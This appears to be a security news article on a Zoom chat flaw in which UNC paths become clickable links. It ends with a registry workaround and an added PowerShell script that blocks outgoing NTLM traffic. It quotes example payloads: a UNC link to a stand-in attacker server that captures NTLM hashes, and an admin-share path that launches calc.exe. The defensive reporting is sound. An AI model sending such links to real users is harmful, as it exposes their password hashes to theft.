The sudden surge in Zoom's popularity is exposing some of the service's weak points, at a time when the coronavirus emergency is forcing many people to work from home and rely on it. We already covered the privacy and encryption issues in an article a few hours ago; here we look at a vulnerability that affects the chat.

Zoom: UNC Path Injection vulnerability

The service lets participants interact through video calls and also through text messages similar to those of Skype or Teams. Links sent to the other participants in a conversation are automatically converted into hyperlinks, giving one-click access to an external online resource. A researcher has discovered, however, that the same happens with UNC (Universal Naming Convention) addresses used by Microsoft operating systems such as Windows, for example “\\host-name\share-name\[object-name]”.

Zoom: UNC Path Injection to steal the Windows password

The screenshot above, published by the BleepingComputer editorial staff, demonstrates this: the link to the website's homepage and the UNC address (“\\evil.server.com\images\cat.jpg”) are treated in the same way. When the user clicks it, the operating system connects to the indicated resource over the SMB (Server Message Block) protocol to fetch the file, and in doing so transmits the username and the (NTLM) hash of the password, which an attacker can then crack using readily available tools.

The same UNC Path Injection technique can be used to push a member of the chat room into launching a program installed on their own computer (the example on the page is a path to an administrative share ending in “$\windows\system32\calc.exe”, which opens the calculator). In this case, however, Windows should prevent the program from running immediately by showing a prompt on screen and asking for permission.

How to fix it?

While waiting for the Zoom team to eliminate the problem at the source, simply by disabling the automatic conversion of UNC addresses into links, users can protect themselves with a workaround. It is worth doing if you are using Zoom on Windows during this period for remote working or other communications. It involves editing a key in the registry (regedit). Under “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0” create a new value named “RestrictSendingNTLMTraffic” and set it to “2”.

The registry entry to modify

No restart is needed after the change. To return to the previous setting, simply delete the value.
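The same workaround, applied from an elevated PowerShell prompt instead of regedit. This is an added example, not code from the article or from Zoom; the function names are our own, and it assumes administrator rights on the machine.

```powershell
# Added example: check, apply and revert the RestrictSendingNTLMTraffic workaround.
# Run as administrator: writing under HKLM requires elevation.
$KeyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$ValueName = 'RestrictSendingNTLMTraffic'

function Get-NtlmOutboundPolicy {
    # Returns the current setting, or $null when the value is absent
    # (the Windows default, where outgoing NTLM authentication is allowed).
    $item = Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$ValueName
}

function Set-NtlmOutboundPolicy {
    param([ValidateSet(0, 1, 2)][int]$Level)
    # 0 = allow all, 1 = audit all (log what would be blocked), 2 = deny all.
    # Level 2 is the setting the article recommends; level 1 is useful first
    # on a domain-joined PC, because 2 also blocks legitimate NTLM logons to
    # file servers. The value is a REG_DWORD and takes effect without a reboot.
    if (-not (Test-Path $KeyPath)) { New-Item -Path $KeyPath -Force | Out-Null }
    New-ItemProperty -Path $KeyPath -Name $ValueName -PropertyType DWord `
        -Value $Level -Force | Out-Null
}

function Remove-NtlmOutboundPolicy {
    # Restores the previous behaviour by deleting the value, as the article describes.
    Remove-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
}

# Usage: record the current state, apply "deny all", and confirm it stuck.
$before = Get-NtlmOutboundPolicy
if ($null -eq $before) { Write-Host 'Before: value not set (NTLM allowed)' }
else                   { Write-Host "Before: $before" }

Set-NtlmOutboundPolicy -Level 2
if ((Get-NtlmOutboundPolicy) -eq 2) {
    Write-Host 'Outgoing NTLM authentication is now denied.'
} else {
    Write-Warning 'Setting was not applied; check that the shell is elevated.'
}
# To undo later: Remove-NtlmOutboundPolicy
```

With level 1, blocked attempts are written to the Microsoft-Windows-NTLM/Operational event log, which lets you confirm nothing legitimate breaks before switching to level 2.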